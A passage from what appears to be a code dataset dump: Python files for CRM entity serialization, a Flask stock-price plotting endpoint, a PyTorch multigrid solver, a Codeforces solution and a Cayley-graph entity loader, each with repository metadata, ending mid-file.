CRM entity classes\n.. moduleauthor:: Petr Rašek \n\n\"\"\"\n\nfrom lxml.etree import Element, SubElement\nfrom simplejson import dumps\n\n\nclass Customer(object):\n \"\"\"Class Customer\n \"\"\"\n\n def __init__(self, id, name, status, segment, birth_no=None, reg_no=None, tax_no=None):\n \"\"\"Class constructor\n\n Customer entity \n\n Args:\n id (int): customer id\n name (str): name\n status (str): status, active|deactive|suspend\n segment (int): segment id, 2|3|4|5 RES|VSE|SME|LE\n birth_no (str): birth number\n reg_no (str): registration number\n tax_no (str): tax identification number\n\n \"\"\"\n\n self.id = id\n self.name = name\n self.status = status\n self.segment = segment\n self.birth_no = birth_no\n self.reg_no = reg_no\n self.tax_no = tax_no\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|status:{2}|segment:{3}'.format(self.id, self.name, self.status, self.segment) + \\\n u'|birth_no:{0}|reg_no:{1}|tax_no:{2}'.format(\n self.birth_no, self.reg_no, self.tax_no)\n return s\n\n def toxml(self):\n \"\"\"Method serializes customer to XML \n \"\"\"\n\n root = Element('customer')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'status').text = self.status\n SubElement(root, 'segment').text = str(self.segment)\n if (self.birth_no != None):\n SubElement(root, 'birth_no').text = self.birth_no\n if (self.reg_no != None):\n SubElement(root, 'reg_no').text = self.reg_no\n if (self.tax_no != None):\n SubElement(root, 'tax_no').text = self.tax_no\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes customer to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['status'] = self.status\n root['segment'] = self.segment\n if (self.birth_no != None):\n root['birth_no'] = self.birth_no\n if (self.reg_no != None):\n root['reg_no'] = self.reg_no\n if (self.tax_no != None):\n root['tax_no'] = self.tax_no\n\n return dumps(root)\n\n\nclass Payer(object):\n \"\"\"Class Payer\n \"\"\"\n\n def __init__(self, id, name, status, billcycle, customer, bank_account=None):\n \"\"\"Class constructor\n\n Payer entity \n\n Args:\n id (int): payer id\n name (str): name\n status (str): status, active|deactive|suspend\n billcycle (int): billcycle id, 1|2|3|4 51|52|53|54 \n bank_account (str): banking account\n customer (id): assigned customer id \n\n \"\"\"\n\n self.id = id\n self.name = name\n self.status = status\n self.billcycle = billcycle\n self.bank_account = bank_account\n self.customer = customer\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|status:{2}|billcycle:{3}'.format(self.id, self.name, self.status, self.billcycle) + \\\n u'|bank_account:{0}|customer:{1}'.format(\n self.bank_account, self.customer)\n return s\n\n def toxml(self):\n \"\"\"Method serializes payer to XML \n \"\"\"\n\n root = Element('payer')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'status').text = self.status\n SubElement(root, 'billcycle').text = str(self.billcycle)\n if (self.bank_account != None):\n SubElement(root, 'bank_account').text = self.bank_account\n SubElement(root, 'customer').text = str(self.customer)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes payer to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['status'] = self.status\n root['billcycle'] = self.billcycle\n if (self.bank_account != None):\n root['bank_account'] = self.bank_account\n root['customer'] = self.customer\n\n return dumps(root)\n\n\nclass Subscriber(object):\n \"\"\"Class Subscriber\n \"\"\"\n\n def __init__(self, id, name, msisdn, status, market, tariff, customer, payer):\n \"\"\"Class constructor\n\n Subscriber entity \n\n Args:\n id (int): subscriber id \n name (str): name\n msisdn (str): MSISDN\n status (str): status, active|deactive|suspend\n market (int): market id, 1|2|3 GSM|DSL|FIX\n tariff (int): tariff id, 433|459|434|460\n customer (int): assigned customer id \n payer (int): assigned payer id \n\n \"\"\"\n\n self.id = id\n self.name = name\n self.msisdn = msisdn\n self.status = status\n self.market = market\n self.tariff = tariff\n self.customer = customer\n self.payer = payer\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|msisdn:{2}|status:{3}'.format(self.id, self.name, self.msisdn, self.status) + \\\n u'|market:{0}|tariff:{1}|customer:{2}|payer:{3}'.format(\n self.market, self.tariff, self.customer, self.payer)\n return s\n\n def toxml(self):\n \"\"\"Method serializes subscriber to XML \n \"\"\"\n\n root = Element('subscriber')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'msisdn').text = self.msisdn\n SubElement(root, 'status').text = self.status\n SubElement(root, 'market').text = str(self.market)\n SubElement(root, 'tariff').text = str(self.tariff)\n SubElement(root, 'customer').text = str(self.customer)\n SubElement(root, 'payer').text = str(self.payer)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes subscriber to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['msisdn'] = self.msisdn\n root['status'] = self.status\n root['market'] = self.market\n root['tariff'] = self.tariff\n root['customer'] = self.customer\n root['payer'] = self.payer\n\n return dumps(root)\n\n\nclass Contact(object):\n \"\"\"Class Contact\n \"\"\"\n\n def __init__(self, id, name, phone=None, email=None, roles=[]):\n \"\"\"Class constructor\n\n Contact entity \n\n Args:\n id (int): contact id \n name (str): name \n phone (str): phone number\n email (str): email\n roles (list): contact roles \n\n \"\"\"\n\n self.id = id\n self.name = name\n self.phone = phone\n self.email = email\n self.roles = roles\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|phone:{2}|email:{3}|roles#'.format(\n self.id, self.name, self.phone, self.email)\n\n if (len(self.roles) > 0):\n\n for role in self.roles:\n s += '{0}#'.format(role)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes contact to XML \n \"\"\"\n\n root = Element('contact')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n if (self.phone != None):\n SubElement(root, 'phone').text = self.phone\n if (self.email != None):\n SubElement(root, 'email').text = self.email\n\n if (len(self.roles) > 0):\n elem = SubElement(root, 'roles')\n\n for role in self.roles:\n elem.append(role.toxml())\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes contact to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n if (self.phone != None):\n root['phone'] = self.phone\n if (self.email != None):\n root['email'] = self.email\n\n if (len(self.roles) > 0):\n el_roles = []\n\n for role in self.roles:\n el_role = {'id': role.id, 'title': role.title,\n 'customer': role.customer, 'payer': role.payer,\n 'subscriber': role.subscriber}\n el_roles.append(el_role)\n\n root['roles'] = {'role': el_roles}\n\n return dumps(root)\n\n\nclass ContactRole(object):\n \"\"\"Class ContactRole\n \"\"\"\n\n def __init__(self, id, title, customer=None, payer=None, subscriber=None):\n \"\"\"Class constructor\n\n Contact role entity \n\n Args:\n id (int): contact id \n title (str): role title, contract|contact|invoicing\n customer (int): assigned customer id\n payer (int): assigned payer id\n subscriber (int): assigned subscriber id \n\n \"\"\"\n\n self.id = id\n self.title = title\n self.customer = customer\n self.payer = payer\n self.subscriber = subscriber\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|title:{1}|customer:{2}|payer:{3}'.format(self.id, self.title, self.customer, self.payer) + \\\n u'|subscriber:{0}'.format(self.subscriber)\n return s\n\n def toxml(self):\n \"\"\"Method serializes contact role to XML \n \"\"\"\n\n root = Element('role')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'title').text = self.title\n if (self.customer != None):\n SubElement(root, 'customer').text = str(self.customer)\n if (self.payer != None):\n SubElement(root, 'payer').text = str(self.payer)\n if (self.subscriber != None):\n SubElement(root, 'subscriber').text = str(self.subscriber)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes contact role to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['title'] = self.title\n if (self.customer != None):\n root['customer'] = self.customer\n if (self.payer != None):\n root['payer'] = self.payer\n if (self.subscriber != None):\n root['subscriber'] = self.subscriber\n\n return dumps(root)\n\n\nclass Address(object):\n \"\"\"Class Address\n \"\"\"\n\n def __init__(self, id, street, street_no, city, zip, roles={}):\n \"\"\"Class constructor\n\n Address role entity \n\n Args:\n id (int): address id \n street (str): street\n street_no (str): street number\n city (str): city\n zip (int): zip code\n roles (list): address roles\n\n \"\"\"\n\n self.id = id\n self.street = street\n self.street_no = street_no\n self.city = city\n self.zip = zip\n self.roles = roles\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|street:{1}|street_no:{2}|city:{3}'.format(self.id, self.street, self.street_no, self.city) + \\\n u'|zip:{0}|roles#'.format(self.zip)\n\n if (len(self.roles) > 0):\n\n for role in self.roles:\n s += '{0}#'.format(role)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes address to XML \n \"\"\"\n\n root = Element('address')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'street').text = self.street\n SubElement(root, 'street_no').text = self.street_no\n SubElement(root, 'city').text = self.city\n SubElement(root, 'zip').text = str(self.zip)\n\n if (len(self.roles) > 0):\n elem = SubElement(root, 'roles')\n\n for role in self.roles:\n elem.append(role.toxml())\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes address to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['street'] = self.street\n root['street_no'] = self.street_no\n root['city'] = self.city\n root['zip'] = self.zip\n\n if (len(self.roles) > 0):\n el_roles = []\n\n for role in self.roles:\n el_role = {'id': role.id, 'title': role.title,\n 'contact': role.contact, 'customer': role.customer,\n 'payer': role.payer, 'subscriber': role.subscriber}\n el_roles.append(el_role)\n\n root['roles'] = {'role': el_roles}\n\n return dumps(root)\n\n\nclass AddressRole(object):\n \"\"\"Class AddressRole\n \"\"\"\n\n def __init__(self, id, title, contact=None, customer=None, payer=None, subscriber=None):\n \"\"\"Class constructor\n\n Address role entity \n\n Args:\n id (int): address id \n title (str): role title, contract|contact|invoicing|delivery\n contact (int): assigned contact id\n customer (int): assigned customer id\n payer (int): assigned payer id\n subscriber (int): assigned subscriber id \n\n \"\"\"\n\n self.id = id\n self.title = title\n self.contact = contact\n self.customer = customer\n self.payer = payer\n self.subscriber = subscriber\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|title:{1}|contact:{2}|customer:{3}'.format(self.id, self.title, self.contact, self.customer) + \\\n u'|payer:{0}|subscriber:{1}'.format(self.payer, self.subscriber)\n return s\n\n def toxml(self):\n \"\"\"Method serializes address role to XML \n \"\"\"\n\n root = Element('role')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'title').text = self.title\n if (self.contact != None):\n SubElement(root, 'contact').text = str(self.contact)\n if (self.customer != None):\n SubElement(root, 'customer').text = str(self.customer)\n if (self.payer != None):\n SubElement(root, 'payer').text = str(self.payer)\n if (self.subscriber != None):\n SubElement(root, 'subscriber').text = str(self.subscriber)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes address role to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['title'] = self.title\n if (self.contact != None):\n root['contact'] = self.contact\n if (self.customer != None):\n root['customer'] = self.customer\n if (self.payer != None):\n root['payer'] = self.payer\n if (self.subscriber != None):\n root['subscriber'] = self.subscriber\n\n return dumps(root)\n\n\nclass Service(object):\n \"\"\"Class Service\n \"\"\"\n\n def __init__(self, id, name, status, params={}):\n \"\"\"Class constructor\n\n Service entity \n\n Args:\n id (int): service id \n name (str): name\n status (str): status, active|deactive|suspend\n params (dict): parameters\n\n \"\"\"\n\n self.id = id\n self.name = name\n self.status = status\n self.params = params\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|status:{2}|params#'.format(\n self.id, self.name, self.status)\n\n if (len(self.params) > 0):\n\n for key, value in self.params.items():\n s += '{0}:{1}#'.format(key, value)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes service to XML \n \"\"\"\n\n root = Element('service')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'status').text = self.status\n\n elem = SubElement(root, 'params')\n for key, value in self.params.items():\n el_param = Element('entry')\n SubElement(el_param, 'key').text = str(key)\n SubElement(el_param, 'value').text = value\n elem.append(el_param)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes service to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['status'] = self.status\n\n el_params = []\n for key, value in self.params.items():\n param = {}\n param['key'] = key\n param['value'] = value\n el_params.append(param)\n\n root['params'] = {'entry': el_params}\n\n return dumps(root)\n\n\nclass ServiceOperation(object):\n \"\"\"Class ServiceOperation\n \"\"\"\n\n def __init__(self, service, customer=None, payer=None, subscriber=None, status=None, params={}):\n \"\"\"Class constructor\n\n Service operation entity \n\n Args:\n service (int): service id\n customer (int): assigned customer id\n payer (int): assigned payer id\n subscriber (int): assigned subscriber id\n status (str): service status, active|deactive|suspend\n params (dict): service parameters\n\n \"\"\"\n\n self.service = service\n self.customer = customer\n self.payer = payer\n self.subscriber = subscriber\n self.status = status\n self.params = params\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'service:{0}|customer:{1}|payer:{2}'.format(self.service, self.customer, self.payer) + \\\n u'|subscriber:{0}|status:{1}|params#'.format(\n self.subscriber, self.status)\n\n if (len(self.params) > 0):\n\n for key, value in self.params.items():\n s += '{0}:{1}#'.format(key, value)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes service operation to XML \n \"\"\"\n\n root = Element('operation')\n\n SubElement(root, 'service').text = str(self.service)\n if (self.customer != None):\n SubElement(root, 'customer').text = str(self.customer)\n if (self.payer != None):\n SubElement(root, 'payer').text = str(self.payer)\n if (self.subscriber != None):\n SubElement(root, 'subscriber').text = str(self.subscriber)\n if (self.status != None):\n SubElement(root, 'status').text = self.status\n\n elParams = SubElement(root, 'params')\n\n for key, value in self.params.items():\n elParam = SubElement(elParams, 'entry')\n elem = SubElement(elParam, 'key')\n elem.text = str(key)\n elem = SubElement(elParam, 'value')\n elem.text = str(value)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes service operation to JSON \n \"\"\"\n\n root = {}\n\n root['service'] = self.service\n if (self.customer != None):\n root['customer'] = self.customer\n if (self.payer != None):\n root['payer'] = self.payer\n if (self.subscriber != None):\n root['subscriber'] = self.subscriber\n if (self.status != None):\n root['status'] = self.status\n\n el_params = []\n for key, value in self.params.items():\n param = {}\n param['key'] = key\n param['value'] = value\n el_params.append(param)\n\n root['params'] = {'entry': el_params}\n\n return dumps(root)\n","repo_name":"hydratk/hydratk-ext-testenv","sub_path":"src/hydratk/extensions/testenv/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":19899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"43381319481","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas_datareader import data as web \nimport plotly\nimport plotly.plotly as plty\nimport plotly.graph_objs as go\nimport io\nimport base64 \n\n\n# In[2]:\n\n\n# creates the flask app\nfrom flask import Flask\napp = Flask (__name__)\n\n\n# In[3]:\n\n\ndef get_adj_close(ticker, start, end):\n \n start = start\n end = end\n info = web.DataReader(ticker, data_source='yahoo', start=start, end=end)['Adj Close']\n return pd.DataFrame(info)\n\n\n# In[4]:\n\n\n#ticker = 'msft'\n\n\n# In[5]:\n\n\n#tick1 = get_adj_close(ticker, '1/2/2017', '26/10/2018')\n\n\n# In[6]:\n\n\ndef stockplot(ticker):\n img = io.BytesIO()\n tick1 = get_adj_close(ticker, '1/2/2017', '26/10/2018')\n tick1[['Adj Close']].plot(figsize=(12,6)) \n plt.title('Price History')\n plt.ylabel('Price (USD)')\n plt.savefig(img, format='png')\n img.seek(0)\n plot_url = base64.b64encode(img.getvalue()).decode()\n return ''.format(plot_url)\n \n# reference https://ntguardian.wordpress.com/2016/09/19/introduction-stock-market-data-python-1/\n\n\n# In[7]:\n\n\n# obtain ticker date for the set time period from quandl\n@app.route(\"/stocks//\")\ndef getStock(name):\n return stockplot(name)\n \n\n\n# In[8]:\n\n\n# #from Gordon's example to return output\n\n# @app.route('/query-example')\n# def query_example():\n# language = request.args.get('language') #if key doesn't exist, returns None\n# # language = language.lower()\n# framework = request.args.get('framework')\n# ticker = request.args['ticker'] #if key doesn't exist, returns a 400, bad request error \n# return '''

The language value is: {}

\n#

The framework value is: {}

\n#

The ticker value is: {}'''.format(language, framework,ticker)\n\n\n# In[9]:\n\n\n# # run the flask app on port 9000 on the localhost\n# if __name__ == \"__main__\":\n# app.run('localhost', 9000, app)\n\n\n# In[ ]:\n\n\nif __name__ == \"__main__\":\n app.run(host = '0.0.0.0', port=9000)\n\n\n# In[ ]:\n\n\n# References\n# https://scotch.io/bar-talk/processing-incoming-request-data-in-flask\n\n","repo_name":"tuggawaugh/Harshil595","sub_path":"FE595midtermBP.py","file_name":"FE595midtermBP.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36585661296","text":"\"\"\"\nPython/PyTorch implementation of a geometric multigrid (MG) solver for elliptic\nequations, such as Poisson and Helmholtz-like equations\nEquations are of the form : Δu - λu = f\n\"\"\"\n\nfrom smoothers import choose_smoother, residual, residualN\nfrom scaling import choose_restriction, choose_interpolation\nimport torch\n\nclass MG():\n \"\"\"Multrigrid solver for Laplace / Helmoltz like equations :\n Δu - λu = f with homogeneous Dirichlet/Neumann boundary conditions\n Currently supported grid types and boundary conditions combinations are :\n - Dirichlet : the grid is vertex-centered and must be odd-sized.\n - Neumann : the grid is cell-centered and must be even-sized.\n \"\"\"\n\n def __init__(self, *, dx, dy, nx, ny, nl, nlevels, grid_type, boundary_cond,\n lambd=0.,\n tol=1e-4,\n max_ite=15,\n presmoother=('gauss_seidel_rb', {'omega':1.2, 'iters':2}),\n postsmoother=('gauss_seidel_rb', {'omega':1.2, 'iters':2}),\n restriction=None,\n interpolation='bilinear',\n dtype=torch.float64,\n device='cpu',\n compiled=True):\n \"\"\"\n Parameters :\n ------------\n dx, dy : float\n Initial mesh size\n nx, ny : int\n Inital grid size\n nl : int\n Number of layers (stacked upon first dimension of tensor)\n nlevels :\n Depth of multigrid cycle (i.e. number of restrictions/interpolations)\n grid_type : {'vertex-centered', 'cell-centered'}\n lambd : float or torch.Tensor\n λ parameter in Helmholtz equation. λ=0 for Poisson equations.\n In case of a multi-layer grid, λ can be a tensor of each λ for each grid.\n tol : float\n Tolerance for stopping criteria in FMG cycle\n max_ite : int\n Maximum number of V-cycles to perform at the end of FMG cycle if\n tolerance is not reached\n presmoother : (string, dict)\n Describe the presmoother used in first half of the multigrid cycle.\n Must be of the form : ('smoother_name', {'omega':omega, 'iters':iters})\n Currently only 'jacobi' and 'gauss_seidel_rb' are supported.\n postsmoother : (string, dict)\n Same as for presmoother, used in the second half of the multigrid cycle.\n restriction : {'HW', 'FW', 'bilinear'}\n Transfer operator used for restriction.\n interpolation : {'bilinear'}\n Transfer operator used for restriction.\n dtype : torch.dtype\n Type used for torch tensors\n device : {'cpu', 'cuda'}\n Device on which are performed calculations\n compiled : bool\n Choose whether to compile using torch.jit.trace or not.\n \"\"\"\n\n self.dtype = dtype\n self.device = device\n\n # Grid parameters\n self.nx = nx\n self.ny = ny\n self.nl = nl\n self.dx = torch.full((), dx, dtype=self.dtype, device=self.device)\n self.dy = torch.full((), dy, dtype=self.dtype, device=self.device)\n\n self.lambd = lambd if isinstance(lambd, torch.Tensor) else torch.full((), lambd, dtype=self.dtype, device=self.device)\n\n assert boundary_cond in ['dirichlet', 'neumann'], \"Boundary condition must be 'dirichlet' or 'neumann'\"\n\n self.nlevels = nlevels\n self.max_ite = max_ite\n self.tol = tol\n\n self.ns = 15 # Number of bottom smoothing (exact solution)\n\n self.shape = (self.nl, self.nx, self.ny) # if self.nlevels > 1 else (self.nx, self.ny)\n if boundary_cond=='dirichlet' :\n assert self.nx%2**self.nlevels==1 and self.ny%2**self.nlevels==1, f\"Grid size {(self.nx, self.ny)} incorrect\"\n if boundary_cond=='neumann':\n assert self.nx%2**self.nlevels==0 and self.ny%2**self.nlevels==0, f\"Grid size {(self.nx, self.ny)} incorrect\"\n\n print(f'PyTorch multigrid solver, {self.device}, {self.dtype}')\n\n v = torch.zeros(self.shape, dtype=self.dtype, device=self.device)\n\n # Setup smoothers\n smoother, param = presmoother\n presmoother = choose_smoother(smoother, boundary_cond)\n self.presmooth = lambda u, f, dx, dy : presmoother(u, f, dx, dy,\n lambd=self.lambd, omega=param['omega'], iters=param['iters'])\n if compiled : self.presmooth = torch.jit.trace(self.presmooth, (v, v, self.dx, self.dy))\n\n smoother, param = postsmoother\n postsmoother = choose_smoother(smoother, boundary_cond)\n self.postsmooth = lambda u, f, dx, dy : postsmoother(u, f, dx, dy,\n lambd=self.lambd, omega=param['omega'], iters=param['iters'])\n if compiled : self.postsmooth = torch.jit.trace(self.postsmooth, (v, v, self.dx, self.dy))\n\n # Setup transfer operators\n default_restriction = {'dirichlet' : 'FW', 'neumann' : 'four_average'}\n if not restriction : restriction = default_restriction[boundary_cond]\n self.restrict = choose_restriction(restriction, boundary_cond)\n self.interpolate = choose_interpolation(interpolation, boundary_cond)\n if compiled : self.restrict = torch.jit.trace(self.restrict, (v,))\n if compiled : self.interpolate = torch.jit.trace(self.interpolate, (v,))\n\n # Setup residual\n res = residual if boundary_cond=='dirichlet' else residualN\n self.residual = lambda u, f, dx, dy : res(u, f, dx, dy, self.lambd)\n if compiled : self.residual = torch.jit.trace(self.residual, (v, v, self.dx, self.dy))\n\n print('Initialization completed')\n\n def solve(self, f):\n return self.FMG(f, self.dx, self.dy)\n\n def Two_cycles(self, u, f, dx, dy):\n\n #Step 1: Relax Au=f on this grid\n u = self.presmooth(u ,f, dx, dy)\n res = self.residual(u, f, dx, dy)\n\n #Step 2: Restrict residual to coarse grid\n res_c = self.restrict(res)\n\n #Step 3:Solve A e_c=res_c on the coarse grid\n e_c = torch.zeros_like(res_c)\n e_c = self.presmooth(e_c, res_c, dx*2, dy*2)\n\n #Step 4: Interpolate(prolong) e_c to fine grid and add to u\n u += self.interpolate(e_c)\n\n #Step 5: Relax Au=f on this grid\n u = self.postsmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n return u, res\n\n\n def V_cycle(self, num_levels, u, f, dx, dy, level=1):\n\n if(level==num_levels): #bottom solve\n for _ in range(self.ns):\n u = self.presmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n return u,res\n\n # Step 1: Relax Au=f on this grid\n u = self.presmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n\n # Step 2: Restrict residual to coarse grid\n res_c = self.restrict(res)\n\n # Step 3:Solve A e_c=res_c on the coarse grid. (Recursively)\n e_c = torch.zeros_like(res_c)\n e_c, res_c = self.V_cycle(num_levels, e_c, res_c, dx*2, dy*2, level=level+1)\n\n # Step 4: Interpolate(prolong) e_c to fine grid and add to u\n u += self.interpolate(e_c)\n\n # Step 5: Relax Au=f on this grid\n u = self.postsmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n\n return u, res\n\n def FMG(self, f, dx, dy, level=1):\n \"\"\"Full Multigrid cycle\"\"\"\n\n if(level==self.nlevels):#bottom solve\n u = torch.zeros_like(f)\n for _ in range(self.ns):\n u = self.presmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n return u, res\n\n # Step 1: Restrict the rhs to a coarse grid\n f_c = self.restrict(f)\n\n # Step 2: Solve the coarse grid problem using FMG\n u_c, _ = self.FMG(f_c, dx*2, dy*2, level+1)\n\n # Step 3: Interpolate u_c to the fine grid\n u = self.interpolate(u_c)\n\n # Step 4: Execute 'nv' V-cycles\n # for _ in range(self.nv):\n # u, res = self.V_cycle(self.nlevels-level, u, f, dx, dy)\n\n u, res = self.V_cycle(self.nlevels-level, u, f, dx, dy)\n\n if level < 2:\n nres = res.norm()/f.norm()\n nite = 0\n while nite < self.max_ite and nres > self.tol:\n u, res = self.V_cycle(self.nlevels-level, u, f, dx, dy)\n nres = res.norm()/f.norm()\n nite += 1\n\n return u, res\n","repo_name":"gauvain-thomas/Geometric-Multigrid","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18255285641","text":"#!/usr/bin/env pypy3\n# -*- coding: UTF-8 -*-\n\nn,k=map(int,input().split())\nk=240-k\nans=0\nchk=1\nwhile (k-chk*5>=0):\n ans+=1\n k-=chk*5\n chk+=1\nprint(min(ans,n))\n","repo_name":"clarinet758/codeforces","sub_path":"etc/GoodBye/GoodBye2016/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12772328580","text":"# -*- coding: utf-8 -*-\nimport sys\nimport re\nimport copy\nimport csv\nimport random\nimport glob\nimport fileinput\nimport cPickle as pickle\nimport pyley\nimport pylru\nfrom sklearn.linear_model import SGDClassifier\nfrom select_aliases import uppercase_first_letters\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ncsv.field_size_limit(sys.maxsize)\n\nCOLUMNS = 5000\n\nMATRIX_KEY = \"M_%s\"\nVECTOR_KEY = \"V_%s_EPOCH_%d\"\nCLASSIFIER_KEY = \"C_%s_EPOCH_%d\"\nSAMPLE_KEY = \"S_%s_EPOCH_%d\"\nFILE_PATTERN = \"/data/pickles/{key}__{version}.pickle\"\n\n\ndef format_alias(alias):\n # Filter numbers.\n if len(alias.split()) == 1:\n try:\n float(alias)\n return None\n except ValueError:\n pass\n\n # uppercase first letters and return.\n return uppercase_first_letters(alias)\n\n\nclass Graph(object):\n client = pyley.CayleyClient()\n graph = pyley.GraphObject()\n\n cache = pylru.lrucache(100) # LRU cache.\n\n NAME = \"http://www.w3.org/2000/01/rdf-schema#label\"\n ALIAS = \"http://rdf.basekb.com/ns/common.topic.alias\"\n ALIAS_PATTERN = \"\\\"%s\\\"@en\"\n TYPE = \"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"\n # TYPE_PATTERN = \"http://rdf.basekb.com/ns/%s\"\n\n def get_entities(self, alias):\n \"\"\"\n Return the list of entity ids with given alias.\n \"\"\"\n # Hit the cache first.\n try:\n r = self.cache[alias]\n return r\n except KeyError:\n pass\n\n entities = []\n name = self.ALIAS_PATTERN % alias\n ## Query the graph:\n # Look for entities with name == alias\n q1 = self.graph.V().Has(self.NAME, name).All()\n response1 = self.client.Send(q1)\n # Look for entities with alias == alias\n q2 = self.graph.V().Has(self.ALIAS, name).All()\n response2 = self.client.Send(q2)\n\n ## Merge both responses to get the list of entities.\n seen_entities = set()\n if response1.result.get('result'):\n l1 = response1.result.get('result')\n for el in l1:\n e = el.get('id')\n if e not in seen_entities:\n entities.append(e)\n seen_entities.add(e)\n if response2.result.get('result'):\n l2 = response2.result.get('result')\n for el in l2:\n e = el.get('id')\n if e not in seen_entities:\n entities.append(e)\n seen_entities.add(e)\n\n # Cache results.\n self.cache[alias] = copy.copy(entities)\n\n return entities\n\n def get_types(self, entity):\n # Check for cached value.\n try:\n cached_result = self.cache[entity]\n return cached_result\n except KeyError:\n pass\n\n t = []\n q = self.graph.V(entity).Out(self.TYPE).All()\n response = self.client.Send(q)\n res = response.result.get('result')\n if not res:\n self.cache[entity] = [] # Update cache.\n return []\n seen_types = set()\n for el in res:\n e = el.get('id')\n if e not in seen_types:\n t.append(e)\n seen_types.add(e)\n\n self.cache[entity] = copy.copy(t) # Update cache.\n return t\n\n def get_all_types(self, entities):\n \"\"\"\n For each entities, return the list of unique types.\n e.g:\n [\"entity_1\", \"entity_2\"] -> [[\"type_b\", \"type_a\"], [\"type_c\", \"type_a\"]]\n \"\"\"\n types = []\n for entity in entities:\n types.append(self.get_types(entity))\n return types\n\n\nclass Loader(object):\n\n graph = Graph()\n X_STORE = {}\n Y_STORE = {}\n\n def load_data(self):\n \"\"\"\n Load data to pickle files.\n \"\"\"\n row_number = 0\n previous_alias = \"\"\n\n for row in csv.reader(sys.stdin):\n row_number += 1\n if row_number < 850000:\n continue\n if row_number % 100 == 0:\n sys.stderr.write(\"Row %d...\\n\" % row_number)\n alias = format_alias(row[2])\n if not alias:\n continue\n x = []\n # Fill vector x.\n for i in xrange(COLUMNS):\n if i < 3:\n continue\n x.append(int(row[i]))\n\n if alias != previous_alias:\n # Save previous values to disk.\n self.save_to_disk()\n previous_alias = alias\n\n entities = self.graph.get_entities(alias)\n types = self.graph.get_types(entities)\n\n idx = random.randint(0, len(entities)) # Assign random entity.\n i = -1\n for entity in entities:\n entity_id = entity.split('/')[-1]\n i += 1\n # Assign alias to one of the entities.\n y = 0\n if i == idx:\n y = 1\n\n # Update entities.\n self.update(entity_id, x, y)\n\n # Update types.\n if not types:\n continue\n for t in types[i]:\n type_id = t.split('/')[-1]\n self.update(type_id, x, y)\n\n def update(self, uid, x, y):\n X_key = MATRIX_KEY % uid\n Y_key = VECTOR_KEY % (uid, 0) # Epoch 0.\n\n # Get previous X and Y\n X = self.X_STORE.get(X_key) or []\n Y = self.Y_STORE.get(Y_key) or []\n\n # Append new values.\n X.append(x)\n Y.append(y)\n\n # Store X and Y back.\n self.X_STORE[X_key] = X\n self.Y_STORE[Y_key] = Y\n\n def save_to_disk(self):\n # Save X and Y to disk.\n for STORE in 